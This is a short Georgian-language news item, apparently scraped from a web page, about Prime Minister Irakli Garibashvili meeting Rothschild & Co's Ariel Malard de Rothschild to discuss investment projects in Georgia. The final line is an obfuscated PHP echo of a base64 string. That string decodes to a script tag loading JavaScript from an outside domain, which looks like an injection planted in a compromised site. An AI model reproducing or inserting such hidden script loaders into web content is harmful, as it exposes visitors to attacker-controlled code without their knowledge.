celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი კომპანია "Rothschild & Co"- ის მმართველ დირექტორს არიელ მალარდ დე როტშილდს შეხვდა.
 
მთავრობის ადმინისტრაციაში გამართულ შეხვედრაზე საუბარი შეეხო საქართველოში არსებულ ხელსაყრელ საინვესტიციო გარემოს.
 
მთავრობის პრეს-სამსახურის გავრცელებული ინფორმაციით, პრემიერ-მინისტრმა აღნიშნა, რომ მთავრობის ეკონომიკური გუნდი ინტენსიურად მუშაობს მსხვილ საინვესტიციო პროექტებზე, რომლის შეთავაზებაც უცხოელი ინვესტორებისთვის უახლოეს მომავალში იგეგმება.
 
ირაკლი ღარიბაშვილის თქმით, საუბარია როგორ ტურისტულ, ასევე ლოგისტიკურ და ინდუსტრიულ პროექტებზე, მათ შორის ფინანსური ცენტრების შექმნაზე და საქართველოს მთავრობა მაქსიმალურად შეუწყობს ხელს ქვეყანაში ინვესტირებით დაინტერესებულ ბიზნესის წარმომადგენლებს.
 
შეხვედრას საქართველოს პრემიერ-მინისტრის სპეციალური მრჩეველი უცხოური ინვესტიციების მიმართულებით ვაზილ ჰუდაკი ესწრებოდა.
 
 
1162
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");